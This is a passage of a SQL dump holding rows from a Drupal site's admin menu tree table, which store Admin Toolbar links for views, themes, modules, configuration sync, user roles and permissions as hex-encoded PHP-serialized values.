('admin', 143, 'admin_toolbar_tools.extra_links:views_ui.content_recent', 'entity.view.collection', 'entity.view.edit_form', 'view=content_recent', 0x613a313a7b733a343a2276696577223b733a31343a22636f6e74656e745f726563656e74223b7d, '', 0x733a31343a22526563656e7420636f6e74656e74223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 143, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 144, 'admin_toolbar_tools.extra_links:views_ui.files', 'entity.view.collection', 'entity.view.edit_form', 'view=files', 0x613a313a7b733a343a2276696577223b733a353a2266696c6573223b7d, '', 0x733a353a2246696c6573223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 144, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 145, 'admin_toolbar_tools.extra_links:views_ui.frontpage', 'entity.view.collection', 'entity.view.edit_form', 'view=frontpage', 0x613a313a7b733a343a2276696577223b733a393a2266726f6e7470616765223b7d, '', 0x733a393a2246726f6e7470616765223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 145, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 147, 'admin_toolbar_tools.extra_links:views_ui.taxonomy_term', 'entity.view.collection', 'entity.view.edit_form', 'view=taxonomy_term', 0x613a313a7b733a343a2276696577223b733a31333a227461786f6e6f6d795f7465726d223b7d, '', 0x733a31333a225461786f6e6f6d79207465726d223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 147, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 148, 'admin_toolbar_tools.extra_links:views_ui.user_admin_people', 'entity.view.collection', 'entity.view.edit_form', 'view=user_admin_people', 0x613a313a7b733a343a2276696577223b733a31373a22757365725f61646d696e5f70656f706c65223b7d, '', 0x733a363a2250656f706c65223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 148, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 149, 'admin_toolbar_tools.extra_links:views_ui.watchdog', 'entity.view.collection', 'entity.view.edit_form', 'view=watchdog', 0x613a313a7b733a343a2276696577223b733a383a227761746368646f67223b7d, '', 0x733a383a225761746368646f67223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 149, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 150, 'admin_toolbar_tools.extra_links:views_ui.who_s_new', 'entity.view.collection', 'entity.view.edit_form', 'view=who_s_new', 0x613a313a7b733a343a2276696577223b733a393a2277686f5f735f6e6577223b7d, '', 0x733a393a2257686f2773206e6577223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 150, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 151, 'admin_toolbar_tools.extra_links:views_ui.who_s_online', 'entity.view.collection', 'entity.view.edit_form', 'view=who_s_online', 0x613a313a7b733a343a2276696577223b733a31323a2277686f5f735f6f6e6c696e65223b7d, '', 0x733a31383a2257686f2773206f6e6c696e6520626c6f636b223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 151, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 153, 'admin_toolbar_tools.extra_links:update.theme_update', 'system.themes_page', 'update.theme_update', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22557064617465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 21, 153, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 154, 'admin_toolbar_tools.extra_links:system.theme_settings', 'system.themes_page', 'system.theme_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a2253657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 21, 154, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 155, 'admin_toolbar_tools.extra_links:system.theme_settings_theme.claro', 'admin_toolbar_tools.extra_links:system.theme_settings', 'system.theme_settings_theme', 'theme=claro', 0x613a313a7b733a353a227468656d65223b733a353a22636c61726f223b7d, '', 0x733a353a22436c61726f223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 21, 154, 155, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 156, 'admin_toolbar_tools.extra_links:system.theme_settings_theme.olivero', 'admin_toolbar_tools.extra_links:system.theme_settings', 'system.theme_settings_theme', 'theme=olivero', 0x613a313a7b733a353a227468656d65223b733a373a226f6c697665726f223b7d, '', 0x733a373a224f6c697665726f223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 21, 154, 156, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 157, 'system.modules_uninstall', 'system.modules_list', 'system.modules_uninstall', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22556e696e7374616c6c206d6f64756c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 22, 157, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 159, 'admin_toolbar_tools.extra_links:update.module_update', 'system.modules_list', 'update.module_update', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22557064617465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 22, 159, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 160, 'admin_toolbar_tools.extra_links:config.import', 'config.sync', 'config.import_full', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22496d706f7274223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 23, 30, 31, 160, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 161, 'admin_toolbar_tools.extra_links:config.export', 'config.sync', 'config.export_full', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a224578706f7274223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 23, 30, 31, 161, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 162, 'admin_toolbar.settings', 'system.admin_config_ui', 'admin_toolbar.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2241646d696e20546f6f6c626172223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33353a22436f6e666967757265207468652041646d696e20546f6f6c626172206d6f64756c652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar', 1, 1, 0, -1, 0x613a303a7b7d, 0, 4, 6, 23, 44, 162, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 163, 'admin_toolbar_search.settings', 'system.admin_config_ui', 'admin_toolbar_search.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a2241646d696e20546f6f6c62617220536561726368223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34323a22436f6e666967757265207468652041646d696e20546f6f6c62617220536561726368206d6f64756c652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_search', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 44, 163, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 164, 'admin_toolbar_tools.settings', 'system.admin_config_ui', 'admin_toolbar_tools.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2241646d696e20546f6f6c62617220546f6f6c73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34313a22436f6e666967757265207468652041646d696e20546f6f6c62617220546f6f6c73206d6f64756c652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 44, 164, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 165, 'admin_toolbar_tools.extra_links:entity.user.field_ui_fields_', 'entity.user.admin_form', 'entity.user.field_ui_fields', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 23, 49, 50, 165, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 166, 'admin_toolbar_tools.extra_links:entity.entity_form_display.user.default_', 'entity.user.admin_form', 'entity.entity_form_display.user.default', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 23, 49, 50, 166, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 167, 'admin_toolbar_tools.extra_links:entity.entity_view_display.user.default_', 'entity.user.admin_form', 'entity.entity_view_display.user.default', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 23, 49, 50, 167, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 168, 'admin_toolbar_tools.extra_links:views_ui.field_list', 'entity.field_storage_config.collection', 'views_ui.reports_fields', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a225573656420696e207669657773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 51, 55, 168, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 169, 'admin_toolbar_tools.extra_links:user.admin_create', 'entity.user.collection', 'user.admin_create', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224164642075736572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 59, 169, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 170, 'admin_toolbar_tools.extra_links:user.admin_permissions', 'entity.user.collection', 'user.admin_permissions', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a225065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 59, 170, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 171, 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'entity.user.collection', 'entity.user_role.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22526f6c6573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 59, 171, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 172, 'admin_toolbar_tools.extra_links:user.role_add', 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'user.role_add', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a2241646420726f6c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -50, 0x613a303a7b7d, 0, 4, 6, 59, 171, 172, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 173, 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.anonymous', 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'entity.user_role.edit_form', 'user_role=anonymous', 0x613a313a7b733a393a22757365725f726f6c65223b733a393a22616e6f6e796d6f7573223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a22757365725f726f6c65223b733a393a22656e746974795f6964223b733a393a22616e6f6e796d6f7573223b7d, 1, 4, 6, 59, 171, 173, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 174, 'admin_toolbar_tools.extra_links:entity.user_role.edit_permissions_form.anonymous', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.anonymous', 'entity.user_role.edit_permissions_form', 'user_role=anonymous', 0x613a313a7b733a393a22757365725f726f6c65223b733a393a22616e6f6e796d6f7573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2245646974207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -1, 0x613a303a7b7d, 0, 5, 6, 59, 171, 173, 174, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 175, 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.authenticated', 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'entity.user_role.edit_form', 'user_role=authenticated', 0x613a313a7b733a393a22757365725f726f6c65223b733a31333a2261757468656e74696361746564223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a22757365725f726f6c65223b733a393a22656e746974795f6964223b733a31333a2261757468656e74696361746564223b7d, 1, 4, 6, 59, 171, 175, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 176, 'admin_toolbar_tools.extra_links:entity.user_role.edit_permissions_form.authenticated', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.authenticated', 'entity.user_role.edit_permissions_form', 'user_role=authenticated', 0x613a313a7b733a393a22757365725f726f6c65223b733a31333a2261757468656e74696361746564223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2245646974207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -1, 0x613a303a7b7d, 0, 5, 6, 59, 171, 175, 176, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 177, 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.content_editor', 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'entity.user_role.edit_form', 'user_role=content_editor', 0x613a313a7b733a393a22757365725f726f6c65223b733a31343a22636f6e74656e745f656469746f72223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a22757365725f726f6c65223b733a393a22656e746974795f6964223b733a31343a22636f6e74656e745f656469746f72223b7d, 1, 4, 6, 59, 171, 177, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 178, 'admin_toolbar_tools.extra_links:entity.user_role.edit_permissions_form.content_editor', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.content_editor', 'entity.user_role.edit_permissions_form', 'user_role=content_editor', 0x613a313a7b733a393a22757365725f726f6c65223b733a31343a22636f6e74656e745f656469746f72223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2245646974207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -1, 0x613a303a7b7d, 0, 5, 6, 59, 171, 177, 178, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 179, 'admin_toolbar_tools.extra_links:entity.user_role.delete_form.content_editor', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.content_editor', 'entity.user_role.delete_form', 'user_role=content_editor', 0x613a313a7b733a393a22757365725f726f6c65223b733a31343a22636f6e74656e745f656469746f72223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 59, 171, 177, 179, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 180, 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.administrator', 'admin_toolbar_tools.extra_links:entity.user_role.collection', 'entity.user_role.edit_form', 'user_role=administrator', 0x613a313a7b733a393a22757365725f726f6c65223b733a31333a2261646d696e6973747261746f72223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a22757365725f726f6c65223b733a393a22656e746974795f6964223b733a31333a2261646d696e6973747261746f72223b7d, 1, 4, 6, 59, 171, 180, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 181, 'admin_toolbar_tools.extra_links:entity.user_role.edit_permissions_form.administrator', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.administrator', 'entity.user_role.edit_permissions_form', 'user_role=administrator', 0x613a313a7b733a393a22757365725f726f6c65223b733a31333a2261646d696e6973747261746f72223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2245646974207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -1, 0x613a303a7b7d, 0, 5, 6, 59, 171, 180, 181, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 182, 'admin_toolbar_tools.extra_links:entity.user_role.delete_form.administrator', 'admin_toolbar_tools.extra_links:entity.user_role.edit_form.administrator', 'entity.user_role.delete_form', 'user_role=administrator', 0x613a313a7b733a393a22757365725f726f6c65223b733a31333a2261646d696e6973747261746f72223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 59, 171, 180, 182, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 183, 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.block_content_type.collection', 'entity.block_content_type.edit_form', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a393a22656e746974795f6964223b733a353a226261736963223b7d, 1, 4, 6, 10, 294, 183, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
